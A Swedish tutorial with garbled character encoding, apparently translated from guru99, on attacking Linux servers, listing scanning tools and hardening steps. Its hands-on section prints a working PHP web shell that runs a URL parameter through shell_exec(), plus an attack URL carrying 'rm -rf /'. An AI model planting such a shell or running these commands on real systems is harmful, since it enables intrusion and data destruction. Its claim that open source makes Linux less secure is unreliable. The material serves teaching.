Hacka Linux OS: Hacka med Ubuntu (Kommandohandledning)
Linux รคr det mest anvรคnda serveroperativsystemet, speciellt fรถr webbservrar. Det รคr รถppen kรคllkod; det betyder att vem som helst kan ha tillgรฅng till kรคllkoden. Detta gรถr det mindre sรคkert jรคmfรถrt med andra operativsystem eftersom angripare kan studera kรคllkoden fรถr att hitta sรฅrbarheter. Linux fรถr Hackers handlar om att utnyttja dessa sรฅrbarheter fรถr att fรฅ obehรถrig รฅtkomst till ett system.
I den hรคr artikeln kommer vi att introducera dig till vad Linux รคr, dess sรคkerhetssรฅrbarheter, hacking med Ubuntu och de motรฅtgรคrder du kan vidta.
Snabbanteckning om Linux
Linux รคr ett operativsystem med รถppen kรคllkod. Det finns mรฅnga distributioner av Linux-baserade operativsystem som Redhat, Fedora och Ubuntu, etc. Till skillnad frรฅn andra operativsystem รคr Linux mindre sรคkert nรคr det kommer till sรคkerhet. Detta beror pรฅ att kรคllkoden รคr tillgรคnglig fritt, sรฅ det รคr lรคtt att studera den fรถr sรฅrbarheter och utnyttja dem jรคmfรถrt med andra operativsystem som inte รคr รถppen kรคllkod. Linux kan anvรคndas som operativsystem fรถr server, dator, surfplatta eller mobil enhet.
Linux-program kan anvรคndas med antingen GUI eller kommandon. Linux-kommandon fรถr Kali Linux hackning รคr mer effektiva och effektiva jรคmfรถrt med att anvรคnda GUI. Av denna anledning hjรคlper det att kรคnna till grundlรคggande Linux-kommandon fรถr hackning.
Se dessa handledningar https://www.guru99.com/unix-linux-tutorial.html om hur man kommer igรฅng med Kali Linux hacka.
Linux Hacking Tools
- Nessusโ detta verktyg kan anvรคndas fรถr Ubuntu hacka, skanna konfigurationsinstรคllningar, patchar och nรคtverk etc. den finns pรฅ https://www.tenable.com/products/nessus
- NMap. Detta verktyg kan anvรคndas fรถr att รถvervaka vรคrdar som kรถrs pรฅ servern och de tjรคnster som de anvรคnder. Den kan ocksรฅ anvรคndas fรถr att skanna efter portar. Den finns pรฅ https://nmap.org/
- SARA โ SARA รคr fรถrkortningen fรถr Security Auditor's Research Assistant. Som namnet antyder kan detta verktyg anvรคndas fรถr att granska nรคtverk mot hot som t.ex SQL Injection, XSS etc. den finns pรฅ http://www-arc.com/sara/sara.html
Listan ovan รคr inte uttรถmmande; det ger dig en uppfattning om vilka verktyg som finns tillgรคngliga fรถr Ubuntu hacka och hacka Linux-system.
Hur man fรถrhindrar Linux-hack
Linux Hacking drar fรถrdel av sรฅrbarheterna i operativsystemet. En organisation kan anta fรถljande policy fรถr att skydda sig mot sรฅdana attacker.
- Patchhanteringโ patchar fixar buggar som angripare utnyttjar fรถr att รคventyra ett system. En bra policy fรถr patchhantering sรคkerstรคller att du stรคndigt tillรคmpar relevanta patchar pรฅ ditt system.
- Korrekt OS-konfigurationโ andra utnyttjande utnyttjar svagheterna i serverns konfiguration. Inaktiva anvรคndarnamn och demoner bรถr inaktiveras. Standardinstรคllningar som vanliga lรถsenord till applikationer, standardanvรคndarnamn och vissa portnummer bรถr รคndras.
- Intrusionsdetekteringssystemโ sรฅdana verktyg kan anvรคndas fรถr att upptรคcka obehรถrig รฅtkomst till systemet. Vissa verktyg har fรถrmรฅgan att upptรคcka och fรถrhindra sรฅdana attacker.
Hackingaktivitet: Hack a Ubuntu Linux-system som anvรคnder PHP
I det hรคr praktiska scenariot kommer vi att lรคra oss hur man hackar med Ubuntu och vi kommer att fรถrse dig med grundlรคggande information om hur du kan anvรคnda PHP att kompromissa med en Linux. Vi kommer inte att rikta oss mot nรฅgot offer. Om du vill prova det kan du installera LAMPP pรฅ din lokala dator.
PHP kommer med tvรฅ funktioner som kan anvรคndas fรถr att kรถra Linux-hackningskommandon. Den har funktionerna exec() och shell_exec(). Funktionen exec() returnerar den sista raden i kommandoutgรฅngen medan shell_exec() returnerar hela resultatet av kommandot som en strรคng.
Fรถr demonstrationsรคndamรฅl, lรฅt oss anta att angriparansvariga laddar upp fรถljande fil pรฅ en webbserver.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
HรR,
Ovanstรฅende skript hรคmtar kommandot frรฅn GET-variabeln som heter cmd. Kommandot kรถrs med shell_exec() och resultaten returneras i webblรคsaren.
Ovanstรฅende kod kan utnyttjas med hjรคlp av fรถljande URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HรR,
- โโฆkonsole.php?cmd=ls%20-lโtilldelar vรคrdet ls โl till variabeln cmd.
Kommandot i Ubuntu fรถr hackning mot servern kommer att utfรถras som
shell_exec('ls -l') ;
Att kรถra ovanstรฅende kod pรฅ en webbserver ger resultat som liknar fรถljande.
Ovanstรฅende kommando visar helt enkelt filerna i den aktuella katalogen och behรถrigheterna
Lรฅt oss anta att angriparen skickar fรถljande kommando
rm -rf /
HรR,
- "rm" tar bort filerna
- "rf" gรถr att rm-kommandot kรถrs i ett rekursivt lรคge. Ta bort alla mappar och filer
- "/" instruerar kommandot att bรถrja radera filer frรฅn rotkatalogen
Attacken URL skulle se ut ungefรคr sรฅ hรคr
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Sammanfattning
- Linux รคr ett populรคrt operativsystem fรถr servrar, stationรคra datorer, surfplattor och mobila enheter.
- Linux รคr รถppen kรคllkod, och kรคllkoden kan erhรฅllas av vem som helst. Detta gรถr det lรคtt att upptรคcka sรฅrbarheterna. Det รคr ett av de bรคsta operativsystemen fรถr hackare.
- Grundlรคggande och nรคtverkshackningskommandon in Ubuntu รคr vรคrdefulla fรถr Linux-hackare.
- Sรฅrbarheter รคr en svaghet som kan utnyttjas fรถr att รคventyra ett system.
- En bra sรคkerhet kan hjรคlpa till att skydda ett system frรฅn att รคventyras av en angripare.

